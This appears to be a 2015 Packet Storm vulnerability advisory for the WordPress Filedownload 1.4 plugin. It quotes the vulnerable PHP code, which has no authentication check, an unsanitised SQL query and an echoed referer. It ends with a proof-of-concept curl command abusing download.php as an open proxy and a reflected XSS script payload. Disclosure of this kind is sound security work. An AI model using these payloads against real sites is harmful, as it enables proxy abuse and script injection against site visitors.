exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Filedownload 1.4 Open Proxy

WordPress Filedownload 1.4 Open Proxy
Posted Aug 5, 2015
Authored by Larry W. Cashdollar

WordPress Filedownload plugin version 1.4 suffers from an open proxy vulnerability.

tags | exploit
SHA-256 | 8a34f8136cd407380fcfe973539ad5729a136bdd902f99381c0f47b2c521e7fc

WordPress Filedownload 1.4 Open Proxy

Change Mirror Download
Title: Open Proxy in filedownload v1.4 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-11
Download Site: https://wordpress.org/plugins/filedownload/
Vendor: Peter Gross
Vendor Notified: 2015-07-11
Vendor Contact: plugins@wordpress.org
Description: Creates a downloadlink with the browsers SaveAs dialog for all available filetypes. A download counter can be shown on the post and admin area.
Vulnerability:
The code in download.php doesn't check to see if a user is logged in before allowing a request to an external site. This flaw can be used to allow malicious code to be loaded into a browser or mask application attacks directed at a target site from behind vulnerable wordpress plugin sites.

27 $type = $_GET[type];
28 $path = $_GET[path];
29 $check = $_GET[check];
30
31 $forbidden = false;
32 $path_parts = pathinfo($path);
33
34 // V0.2 Security: not longer allowed relative pathes
35 if (strpos($path, 'http://') === false) $forbidden = true;
36 if (!(strpos($path, '..') === false)) $forbidden = true;
37 if (!(strpos($path, '.php') === false)) $forbidden = true;
38
39 // version 1.4 external downloads allowed?
40 $allow_external_download = get_blog_option( get_current_blog_id(), "filedown load_allow_external_download", "not available" );
41 if ($allow_external_download == "0") // then external url downloads are not allowed
42 {
43
44 $site_url = strtolower(get_site_url( get_current_blog_id() ));
45 $download_url = strtolower(substr($path_parts[dirname], 0, strlen($site_ur l)));



Possible Blind SQL Injection and Persistent XSS, I haven't been able to successfully exploit these:

Lines 53-54 don't handle user-input properly for $filename:

53 $query = 'SELECT * FROM '.$wpdb->prefix.'filedownload WHERE filename = \''.$filename.'\'';
54 $result=$wpdb->get_row($query, ARRAY_A);

The filenames are sent back to the user with out any sanitization, I believe if you can create a XSS filename as your payload you maybe able
to inject persistent XSS filenames into the database.

149 foreach ($selected as $filename)
150 {
151 filedownload_Reset($filename);
152 print "filename = $filename<br />";
153 }
154 }


Reflected XSS

Line 61 of download.php echos the contents of referer to the user with out sanitizing its contents first leading to reflected XSS:

61 <meta http-equiv="refresh" content="3; URL=<?php echo $_GET[referer]; ?>"


CVEID:
OSVDB:
Exploit Code:
• $ curl "http://www.vapidlabs.com/wp-content/plugins/filedownload/download.php?path=http://www.google.com"
• http://www.vapidlabs.com/wp-content/plugins/filedownload/download.php?path=www.google.com&referer="><script>alert(1);</script>
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close